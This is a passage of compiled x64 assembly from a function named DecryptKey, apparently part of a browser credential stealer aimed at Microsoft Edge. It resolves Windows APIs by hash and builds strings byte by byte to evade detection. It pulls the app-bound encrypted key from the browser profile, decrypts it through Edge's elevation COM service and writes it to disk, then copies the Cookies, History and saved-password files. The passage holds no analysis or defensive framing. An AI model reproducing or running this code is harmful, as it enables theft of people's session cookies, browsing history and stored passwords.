	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR orCookiesPath$[rsp]
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 538
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR orHistoryPath$[rsp]
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 539
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR orPasswordPath$[rsp]
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 541
	mov	BYTE PTR network$[rsp], 92		; 0000005cH
	mov	BYTE PTR network$[rsp+1], 78		; 0000004eH
	mov	BYTE PTR network$[rsp+2], 101		; 00000065H
	mov	BYTE PTR network$[rsp+3], 116		; 00000074H
	mov	BYTE PTR network$[rsp+4], 119		; 00000077H
	mov	BYTE PTR network$[rsp+5], 111		; 0000006fH
	mov	BYTE PTR network$[rsp+6], 114		; 00000072H
	mov	BYTE PTR network$[rsp+7], 107		; 0000006bH
	mov	BYTE PTR network$[rsp+8], 0
; Line 543
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv698[rsp], rax
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orCookiesPath$[rsp+rax]
	mov	QWORD PTR tv696[rsp], rax
	mov	r8, QWORD PTR tv698[rsp]
	mov	rdx, QWORD PTR tv696[rsp]
	lea	rcx, QWORD PTR network$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 544
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv711[rsp], rax
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orCookiesPath$[rsp+rax]
	mov	QWORD PTR tv709[rsp], rax
	mov	r8, QWORD PTR tv711[rsp]
	mov	rdx, QWORD PTR tv709[rsp]
	lea	rcx, QWORD PTR cookiesFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 545
	lea	rcx, QWORD PTR orHistoryPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv724[rsp], rax
	lea	rcx, QWORD PTR orHistoryPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orHistoryPath$[rsp+rax]
	mov	QWORD PTR tv722[rsp], rax
	mov	r8, QWORD PTR tv724[rsp]
	mov	rdx, QWORD PTR tv722[rsp]
	lea	rcx, QWORD PTR historyFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 546
	lea	rcx, QWORD PTR orPasswordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv737[rsp], rax
	lea	rcx, QWORD PTR orPasswordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orPasswordPath$[rsp+rax]
	mov	QWORD PTR tv735[rsp], rax
	mov	r8, QWORD PTR tv737[rsp]
	mov	rdx, QWORD PTR tv735[rsp]
	lea	rcx, QWORD PTR passwordFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 557
	mov	DWORD PTR hashCreateFileA$[rsp], 896765632 ; 35738ec0H
; Line 558
	mov	r8d, 896765632				; 35738ec0H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateFileA$[rsp], rax
; Line 559
	cmp	QWORD PTR pCreateFileA$[rsp], 0
	jne	SHORT $LN13@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN13@DecryptKey:
; Line 560
	mov	rax, QWORD PTR pCreateFileA$[rsp]
	mov	QWORD PTR tv751[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 3
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, -2147483648			; 80000000H
	lea	rcx, QWORD PTR path$[rsp]
	call	QWORD PTR tv751[rsp]
	mov	QWORD PTR hFile$[rsp], rax
; Line 561
	cmp	QWORD PTR hFile$[rsp], 0
	jne	SHORT $LN14@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN14@DecryptKey:
; Line 564
	mov	DWORD PTR hashGetFileSize$[rsp], -1940020856 ; 8c5da188H
; Line 565
	mov	r8d, -1940020856			; 8c5da188H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFileSize$[rsp], rax
; Line 566
	cmp	QWORD PTR pGetFileSize$[rsp], 0
	jne	SHORT $LN15@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN15@DecryptKey:
; Line 567
	mov	rax, QWORD PTR pGetFileSize$[rsp]
	mov	QWORD PTR tv762[rsp], rax
	xor	edx, edx
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv762[rsp]
	mov	DWORD PTR dwFileSize$[rsp], eax
; Line 568
	cmp	DWORD PTR dwFileSize$[rsp], 0
	jne	SHORT $LN16@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN16@DecryptKey:
; Line 570
	mov	QWORD PTR fileBuf$[rsp], 0
; Line 571
	mov	eax, DWORD PTR dwFileSize$[rsp]
	inc	eax
	mov	eax, eax
	lea	rdx, QWORD PTR fileBuf$[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN17@DecryptKey
; Line 572
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN17@DecryptKey:
; Line 582
	mov	DWORD PTR hashReadFile$[rsp], -1576683562 ; a205b7d6H
; Line 583
	mov	r8d, -1576683562			; a205b7d6H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pReadFile$[rsp], rax
; Line 584
	cmp	QWORD PTR pReadFile$[rsp], 0
	jne	SHORT $LN18@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN18@DecryptKey:
; Line 585
	mov	rax, QWORD PTR pReadFile$[rsp]
	mov	QWORD PTR tv815[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	xor	r9d, r9d
	mov	r8d, DWORD PTR dwFileSize$[rsp]
	mov	rdx, QWORD PTR fileBuf$[rsp]
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv815[rsp]
	test	eax, eax
	jne	SHORT $LN19@DecryptKey
; Line 586
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN19@DecryptKey:
; Line 590
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 591
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 592
	cmp	QWORD PTR pCloseHandle$[rsp], 0
	jne	SHORT $LN20@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN20@DecryptKey:
; Line 594
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv825[rsp], rax
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv825[rsp]
; Line 596
	mov	BYTE PTR patternKey$[rsp], 97		; 00000061H
	mov	BYTE PTR patternKey$[rsp+1], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+2], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+3], 95		; 0000005fH
	mov	BYTE PTR patternKey$[rsp+4], 98		; 00000062H
	mov	BYTE PTR patternKey$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR patternKey$[rsp+6], 117	; 00000075H
	mov	BYTE PTR patternKey$[rsp+7], 110	; 0000006eH
	mov	BYTE PTR patternKey$[rsp+8], 100	; 00000064H
	mov	BYTE PTR patternKey$[rsp+9], 95		; 0000005fH
	mov	BYTE PTR patternKey$[rsp+10], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+11], 110	; 0000006eH
	mov	BYTE PTR patternKey$[rsp+12], 99	; 00000063H
	mov	BYTE PTR patternKey$[rsp+13], 114	; 00000072H
	mov	BYTE PTR patternKey$[rsp+14], 121	; 00000079H
	mov	BYTE PTR patternKey$[rsp+15], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+16], 116	; 00000074H
	mov	BYTE PTR patternKey$[rsp+17], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+18], 100	; 00000064H
	mov	BYTE PTR patternKey$[rsp+19], 95	; 0000005fH
	mov	BYTE PTR patternKey$[rsp+20], 107	; 0000006bH
	mov	BYTE PTR patternKey$[rsp+21], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+22], 121	; 00000079H
	mov	BYTE PTR patternKey$[rsp+23], 34	; 00000022H
	mov	BYTE PTR patternKey$[rsp+24], 58	; 0000003aH
	mov	BYTE PTR patternKey$[rsp+25], 34	; 00000022H
	mov	BYTE PTR patternKey$[rsp+26], 0
; Line 597
	mov	QWORD PTR keyPointer$[rsp], 0
; Line 598
	lea	rcx, QWORD PTR patternKey$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	QWORD PTR tv867[rsp], rax
	mov	rax, QWORD PTR fileBuf$[rsp]
	mov	QWORD PTR tv865[rsp], rax
	lea	r9, QWORD PTR keyPointer$[rsp]
	mov	r8, QWORD PTR tv867[rsp]
	lea	rdx, QWORD PTR patternKey$[rsp]
	mov	rcx, QWORD PTR tv865[rsp]
	call	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z	; FindPatternA
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN21@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN21@DecryptKey:
; Line 599
	lea	rcx, QWORD PTR patternKey$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	rcx, QWORD PTR keyPointer$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR keyPointer$[rsp], rax
; Line 600
	mov	DWORD PTR sizeKeyB64$[rsp], 0
; Line 601
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@DecryptKey
$LN2@DecryptKey:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@DecryptKey:
; Line 602
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 34					; 00000022H
	jne	SHORT $LN22@DecryptKey
; Line 603
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	mov	BYTE PTR [rcx+rax], 0
; Line 604
	jmp	SHORT $LN3@DecryptKey
$LN22@DecryptKey:
; Line 606
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
; Line 607
	mov	eax, DWORD PTR sizeKeyB64$[rsp]
	inc	eax
	mov	DWORD PTR sizeKeyB64$[rsp], eax
; Line 608
	jmp	SHORT $LN2@DecryptKey
$LN3@DecryptKey:
; Line 615
	mov	DWORD PTR hashCoInitializeEx$[rsp], -731484482 ; d4666ebeH
; Line 616
	mov	r8d, -731484482				; d4666ebeH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoInitializeEx$[rsp], rax
; Line 617
	cmp	QWORD PTR pCoInitializeEx$[rsp], 0
	jne	SHORT $LN23@DecryptKey
; Line 618
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN23@DecryptKey:
; Line 621
	mov	rax, QWORD PTR pCoInitializeEx$[rsp]
	mov	QWORD PTR tv893[rsp], rax
	mov	edx, 2
	xor	ecx, ecx
	call	QWORD PTR tv893[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 622
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN24@DecryptKey
; Line 623
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN24@DecryptKey:
; Line 627
	mov	DWORD PTR hashCoUninitialize$[rsp], 691362315 ; 29355a0bH
; Line 628
	mov	r8d, 691362315				; 29355a0bH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoUninitialize$[rsp], rax
; Line 629
	cmp	QWORD PTR pCoUninitialize$[rsp], 0
	jne	SHORT $LN25@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN25@DecryptKey:
; Line 636
	mov	DWORD PTR hashCoCreateInstance$[rsp], -1213256403 ; b7af2d2dH
; Line 637
	mov	r8d, -1213256403			; b7af2d2dH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoCreateInstance$[rsp], rax
; Line 638
	cmp	QWORD PTR pCoCreateInstance$[rsp], 0
	jne	SHORT $LN26@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN26@DecryptKey:
; Line 639
	mov	rax, QWORD PTR pCoCreateInstance$[rsp]
	mov	QWORD PTR tv944[rsp], rax
	lea	rax, QWORD PTR pElevatorEdge$[rsp]
	mov	QWORD PTR [rsp+32], rax
	lea	r9, QWORD PTR EdgeIID$[rsp]
	mov	r8d, 4
	xor	edx, edx
	lea	rcx, QWORD PTR EdgeCLSID$[rsp]
	call	QWORD PTR tv944[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 647
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN27@DecryptKey
; Line 648
	call	QWORD PTR pCoUninitialize$[rsp]
; Line 649
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN27@DecryptKey:
; Line 663
	mov	DWORD PTR hashCoSetProxyBlanket$[rsp], 1618607058 ; 6079fbd2H
; Line 664
	mov	r8d, 1618607058				; 6079fbd2H
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoSetProxyBlanket$[rsp], rax
; Line 665
	cmp	QWORD PTR pCoSetProxyBlanket$[rsp], 0
	jne	SHORT $LN28@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN28@DecryptKey:
; Line 666
	mov	rax, QWORD PTR pCoSetProxyBlanket$[rsp]
	mov	QWORD PTR tv961[rsp], rax
	mov	DWORD PTR [rsp+56], 64			; 00000040H
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 3
	mov	DWORD PTR [rsp+32], 6
	mov	r9, -1
	mov	r8d, -1					; ffffffffH
	mov	edx, -1					; ffffffffH
	mov	rcx, QWORD PTR pElevatorEdge$[rsp]
	call	QWORD PTR tv961[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 677
	mov	QWORD PTR decryptedDataBSTR$[rsp], 0
; Line 678
	mov	DWORD PTR dwLastError$[rsp], 0
; Line 679
	mov	DWORD PTR length$[rsp], 0
; Line 680
	lea	rdx, QWORD PTR length$[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	call	?Base64Decode@@YAPEADPEBDAEAH@Z		; Base64Decode
	mov	QWORD PTR encKey$[rsp], rax
; Line 681
	mov	BYTE PTR sOleAut32$[rsp], 79		; 0000004fH
	mov	BYTE PTR sOleAut32$[rsp+1], 108		; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sOleAut32$[rsp+3], 65		; 00000041H
	mov	BYTE PTR sOleAut32$[rsp+4], 117		; 00000075H
	mov	BYTE PTR sOleAut32$[rsp+5], 116		; 00000074H
	mov	BYTE PTR sOleAut32$[rsp+6], 51		; 00000033H
	mov	BYTE PTR sOleAut32$[rsp+7], 50		; 00000032H
	mov	BYTE PTR sOleAut32$[rsp+8], 46		; 0000002eH
	mov	BYTE PTR sOleAut32$[rsp+9], 100		; 00000064H
	mov	BYTE PTR sOleAut32$[rsp+10], 108	; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+11], 108	; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+12], 0
; Line 682
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv968[rsp], rax
	lea	rcx, QWORD PTR sOleAut32$[rsp]
	call	QWORD PTR tv968[rsp]
	mov	QWORD PTR hOleAut32$[rsp], rax
; Line 683
	cmp	QWORD PTR hOleAut32$[rsp], 0
	jne	SHORT $LN29@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN29@DecryptKey:
; Line 686
	mov	DWORD PTR hashSysAllocStringByteLen$[rsp], -985302606 ; c54579b2H
; Line 687
	mov	r8d, -985302606				; c54579b2H
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysAllocStringByteLen$[rsp], rax
; Line 688
	cmp	QWORD PTR pSysAllocStringByteLen$[rsp], 0
	jne	SHORT $LN30@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN30@DecryptKey:
; Line 691
	mov	DWORD PTR hashSysStringByteLen$[rsp], 1739000677 ; 67a70b65H
; Line 692
	mov	r8d, 1739000677				; 67a70b65H
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysStringByteLen$[rsp], rax
; Line 693
	cmp	QWORD PTR pSysStringByteLen$[rsp], 0
	jne	SHORT $LN31@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN31@DecryptKey:
; Line 696
	mov	DWORD PTR hashSysFreeString$[rsp], 2140232812 ; 7f915c6cH
; Line 697
	mov	r8d, 2140232812				; 7f915c6cH
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysFreeString$[rsp], rax
; Line 698
	cmp	QWORD PTR pSysFreeString$[rsp], 0
	jne	SHORT $LN32@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN32@DecryptKey:
; Line 699
	mov	rax, QWORD PTR pSysAllocStringByteLen$[rsp]
	mov	QWORD PTR tv991[rsp], rax
	mov	eax, DWORD PTR length$[rsp]
	sub	eax, 4
	mov	rcx, QWORD PTR encKey$[rsp]
	add	rcx, 4
	mov	edx, eax
	call	QWORD PTR tv991[rsp]
	mov	QWORD PTR bstrEncKey$[rsp], rax
; Line 700
	mov	rax, QWORD PTR pElevatorEdge$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	rax, QWORD PTR [rax+64]
	mov	QWORD PTR tv1032[rsp], rax
	lea	r9, QWORD PTR dwLastError$[rsp]
	lea	r8, QWORD PTR decryptedDataBSTR$[rsp]
	mov	rdx, QWORD PTR bstrEncKey$[rsp]
	mov	rcx, QWORD PTR pElevatorEdge$[rsp]
	call	QWORD PTR tv1032[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 701
	cmp	QWORD PTR bstrEncKey$[rsp], 0
	je	SHORT $LN33@DecryptKey
; Line 702
	mov	rax, QWORD PTR pSysFreeString$[rsp]
	mov	QWORD PTR tv1036[rsp], rax
	mov	rcx, QWORD PTR bstrEncKey$[rsp]
	call	QWORD PTR tv1036[rsp]
	npad	1
$LN33@DecryptKey:
; Line 705
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN34@DecryptKey
; Line 706
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
; Line 707
	jmp	$LN35@DecryptKey
$LN34@DecryptKey:
; Line 716
	mov	DWORD PTR hashWriteFile$8[rsp], -339353823 ; ebc5df21H
; Line 717
	mov	r8d, -339353823				; ebc5df21H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pWriteFile$4[rsp], rax
; Line 718
	cmp	QWORD PTR pWriteFile$4[rsp], 0
	jne	SHORT $LN36@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN36@DecryptKey:
; Line 722
	mov	rax, QWORD PTR pCreateFileA$[rsp]
	mov	QWORD PTR tv1052[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 2
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 1073741824				; 40000000H
	lea	rcx, QWORD PTR keyPath$[rsp]
	call	QWORD PTR tv1052[rsp]
	mov	QWORD PTR hFile$5[rsp], rax
; Line 723
	mov	rax, QWORD PTR pWriteFile$4[rsp]
	mov	QWORD PTR tv1068[rsp], rax
	mov	rax, QWORD PTR pSysStringByteLen$[rsp]
	mov	QWORD PTR tv1059[rsp], rax
	mov	rcx, QWORD PTR decryptedDataBSTR$[rsp]
	call	QWORD PTR tv1059[rsp]
	mov	DWORD PTR tv1066[rsp], eax
	mov	rax, QWORD PTR decryptedDataBSTR$[rsp]
	mov	QWORD PTR tv1064[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	xor	r9d, r9d
	mov	r8d, DWORD PTR tv1066[rsp]
	mov	rdx, QWORD PTR tv1064[rsp]
	mov	rcx, QWORD PTR hFile$5[rsp]
	call	QWORD PTR tv1068[rsp]
; Line 725
	mov	DWORD PTR hashCopyFileA$6[rsp], 528854519 ; 1f85adf7H
; Line 731
	mov	r8d, 528854519				; 1f85adf7H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCopyFileA$3[rsp], rax
; Line 732
	cmp	QWORD PTR pCopyFileA$3[rsp], 0
	jne	SHORT $LN37@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN37@DecryptKey:
; Line 737
	mov	DWORD PTR hashSleep$7[rsp], 1231028136	; 495fffa8H
; Line 739
	mov	r8d, 1231028136				; 495fffa8H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSleep$9[rsp], rax
; Line 740
	lea	rdx, QWORD PTR cookiesPath$[rsp]
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?CreateCopyFile@@YA_NPEAD0@Z		; CreateCopyFile
	movzx	eax, al
	test	eax, eax
	je	$LN38@DecryptKey
; Line 741
	mov	DWORD PTR i$2[rsp], 0
	jmp	SHORT $LN7@DecryptKey
$LN5@DecryptKey:
	mov	eax, DWORD PTR i$2[rsp]
	inc	eax
	mov	DWORD PTR i$2[rsp], eax
$LN7@DecryptKey:
	cmp	DWORD PTR i$2[rsp], 1000		; 000003e8H
	jge	SHORT $LN6@DecryptKey
; Line 742
	mov	rax, QWORD PTR pCopyFileA$3[rsp]
	mov	QWORD PTR tv1089[rsp], rax
	xor	r8d, r8d
	lea	rdx, QWORD PTR cookiesPath$[rsp]
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	QWORD PTR tv1089[rsp]
	test	eax, eax
	je	SHORT $LN39@DecryptKey
; Line 743
	jmp	SHORT $LN6@DecryptKey
$LN39@DecryptKey:
; Line 745
	jmp	SHORT $LN5@DecryptKey
$LN6@DecryptKey:
; Line 747
	mov	rax, QWORD PTR pCopyFileA$3[rsp]
	mov	QWORD PTR tv1096[rsp], rax
	xor	r8d, r8d
	lea	rdx, QWORD PTR historyPath$[rsp]
	lea	rcx, QWORD PTR orHistoryPath$[rsp]
	call	QWORD PTR tv1096[rsp]
; Line 751
	mov	rax, QWORD PTR pCopyFileA$3[rsp]
	mov	QWORD PTR tv1103[rsp], rax
	xor	r8d, r8d
	lea	rdx, QWORD PTR passwordPath$[rsp]
	lea	rcx, QWORD PTR orPasswordPath$[rsp]
	call	QWORD PTR tv1103[rsp]
$LN38@DecryptKey:
; Line 766
	mov	rax, QWORD PTR pSysFreeString$[rsp]
	mov	QWORD PTR tv1107[rsp], rax
	mov	rcx, QWORD PTR decryptedDataBSTR$[rsp]
	call	QWORD PTR tv1107[rsp]
; Line 767
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv1111[rsp], rax
	mov	rcx, QWORD PTR hFile$5[rsp]
	call	QWORD PTR tv1111[rsp]
	npad	1
$LN35@DecryptKey:
; Line 770
	mov	rcx, QWORD PTR fileBuf$[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 775
	lea	rcx, QWORD PTR apiResolve$[rsp]
